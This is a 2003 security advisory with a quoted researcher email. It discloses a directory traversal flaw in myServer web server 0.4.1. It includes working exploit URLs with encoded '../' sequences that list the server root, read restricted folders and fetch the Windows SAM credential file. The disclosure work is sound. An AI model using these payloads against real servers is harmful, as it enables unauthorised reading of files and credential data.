myServer Web Server Input Validation Flaw Discloses Files on the System to Remote Users
|
|
SecurityTracker Alert ID: 1006999 |
|
SecurityTracker URL: http://securitytracker.com/id/1006999
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 16 2003
|
Impact:
Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 0.4.1
|
Description:
Ziv Kamir reported a directory traversal flaw in the 'myServer' web server. A remote user can view files on the system located outside of the web document directory.
It is reported that a remote user can request a URL containing encoded directory traversal characters ('%2e%2e/') to traverse the directory and view arbitrary files with the privileges of the web server process.
Some demonstration exploit URLs are provided:
http://[target]/%2e%2e/%2e%2e/%2e%2ewinnt/repair/sam._
http://[target]/%2e%2e/logs
http://[target]/%2e%2e/system
|
Impact:
A remote user can view files on the system with the privileges of the web service.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: myserverweb.sourceforge.net/ (Links to External Site)
|
Cause:
Access control error, Input validation error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 16 Jun 2003 00:14:26 -0700 (PDT)
Subject: Vulnerability Under Myserver
|
This is a multi-part message in MIME format.
--------------030304040200010802000800
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi ,
------------------------------------------------------------------------
Do you Yahoo!?
The New Yahoo! Search
<http://us.rd.yahoo.com/search/mailsig/*http://search.yahoo.com> -
Faster. Easier. Bingo.
--------------030304040200010802000800
Content-Type: text/plain;
name="MyServer.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="MyServer.txt"
15/06/03
Ziv Kamir
---------
-------------------------------------------------------
Application: myServer Web
Web Site: myserverweb.sourceforge.net
Versions: 0.4.1
Platform: Windows ( Tested On Windows OS )
Bugs: Directory traversal Bug
Credits:
########
#################################
# #
# Ziv Kamir #
# #
# Email : vulncode@yahoo.com #
# #
# #
#################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
===============
1) Introduction
===============
myServer Web is a free and easy to configure web server.
=======
2) Bug
=======
myServer Web suffers from Directory traversal , it is possible to break out of the web root and read arbitrary files from the server
And view the Contents Of Directories .
===========
3) The Code
===========
Directory traversal
===================
To View The Contents of The Root Folder ( c:\ ) :
##################################################
http://10.10.10.1/%2e%2e/%2e%2e/%2e%2e
To View The Sam File :
######################
http://10.10.10.1/%2e%2e/%2e%2e/%2e%2ewinnt/repair/sam._
Access Restricted Myserver Web Folders :
##########################################
http://10.10.10.1/%2e%2e/logs
http://10.10.10.1/%2e%2e/system
======
4) Fix
======
Date of Vendor Notification:
Status:
==============================================================================================
*** The Data is for educational purpose only. ***
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages.
==============================================================================================
--------------030304040200010802000800--
|
|
